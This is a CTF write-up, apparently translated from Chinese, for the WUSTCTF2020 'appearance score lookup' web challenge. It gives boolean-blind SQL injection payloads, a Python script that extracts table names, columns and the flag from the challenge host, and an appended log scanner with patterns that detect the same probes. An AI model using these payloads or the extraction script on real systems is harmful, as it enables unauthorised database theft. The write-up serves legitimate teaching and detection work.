WEB | [WUSTCTF2020] 颜值成绩查询 (Appearance Score Lookup)

Published 2023-05-06 14:57:03, author: scarecr0w7


The page asks for a number and looks up a score for it. Entering 1 produces the URL parameter ?stunum=1, which suggests an injection point.

http://0c6ebf06-dd69-4596-8c4b-a13e10a76d3e.node4.buuoj.cn:81/?stunum=1


Entering 2

Entering 3

Entering 4

Values up to 4 return a page, and each one renders different content. That difference is the oracle for a boolean-based blind injection.
Payload:

if(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1)='f',1,2)

If the first character of the table list is f the expression evaluates to 1, otherwise to 2; 1 renders the stunum=1 page and 2 renders the stunum=2 page.
A quick test confirms it works.

Writing the script

import requests

# Target from the writeup; the injected expression is placed directly in the stunum parameter.
url = 'http://0c6ebf06-dd69-4596-8c4b-a13e10a76d3e.node4.buuoj.cn:81/?stunum='
# Candidate characters for each position of the result (renamed from `str`, which shadowed the builtin).
charset = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',',','.','@','_','-',':',';','[',']','{','}']
# Template: the true branch yields 1 (the stunum=1 page), the false branch 2 (the stunum=2 page).
payload = "if(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1)='%s',1,2)"
result = ''

for i in range(1, 30):
    for s in charset:
        res = requests.get(url + payload % (i, s), timeout=10)
        # The stunum=1 page contains this string; seeing it means the guessed character is right.
        if res.status_code == 200 and 'Hi admin, your score is: 100' in res.text:
            print(s)
            result += s
            break
    else:
        # No character matched at this position, so the end of the string has been reached.
        break
print(result)

Dumping table names

if(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1)='f',1,2)

flag,score

Dumping column names (the table_name in the template is replaced accordingly)

if(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),1,1)='i',1,2)

flag,value

Dumping the data

if(substr((select(group_concat(value))from(flag)),1,1)='f',1,2)


This yields the flag

flag{bf8bc597-fd8b-4761-a041-3684fd2e50e2}
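As an added, defender-side example that is not part of the original writeup: a scan over web-server access-log lines that flags requests whose stunum parameter carries the probe shape used above (an if(substr( conditional wrapping a subselect, optionally against information_schema). The log lines, IP addresses and timestamps are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote_plus

# Constructed sample access-log lines in common log format (not from the challenge server).
# The last two carry the same boolean-blind probe shape as the writeup's payloads.
SAMPLE_LOG = """\
10.0.0.5 - - [06/May/2023:14:57:03 +0800] "GET /?stunum=1 HTTP/1.1" 200 512
10.0.0.5 - - [06/May/2023:14:57:05 +0800] "GET /?stunum=4 HTTP/1.1" 200 498
10.0.0.9 - - [06/May/2023:14:58:11 +0800] "GET /?stunum=if(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1)='f',1,2) HTTP/1.1" 200 512
10.0.0.9 - - [06/May/2023:14:58:12 +0800] "GET /?stunum=if(substr((select(group_concat(value))from(flag)),1,1)='f',1,2) HTTP/1.1" 200 512
"""

# client ip, request path (with query string) and status code from a common-log-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Indicators of the boolean-blind probe. They are matched on the URL-decoded,
# lower-cased parameter value, so percent-encoding or mixed case does not hide them.
INDICATORS = [
    ("information_schema", re.compile(r"information_schema")),
    ("conditional-substr", re.compile(r"\bif\s*\(\s*substr\s*\(")),
    ("subselect", re.compile(r"\(\s*select\b")),
]

def inspect_value(value: str) -> list[str]:
    """Return the names of the indicators present in one decoded parameter value."""
    decoded = unquote_plus(value).lower()  # second decode catches double-encoded values
    return [name for name, rx in INDICATORS if rx.search(decoded)]

def scan_log(text: str, param: str = "stunum") -> list[dict]:
    """Return one finding per request whose `param` value trips at least one indicator."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        ip, path, status = m.groups()
        for value in parse_qs(urlparse(path).query).get(param, []):
            hits = inspect_value(value)
            if hits:
                findings.append({"ip": ip, "status": status, "indicators": hits})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The plain numeric lookups produce no finding; a real deployment would also count how many such flagged requests one client sends per minute, since the character-by-character oracle in the script above needs hundreds of them.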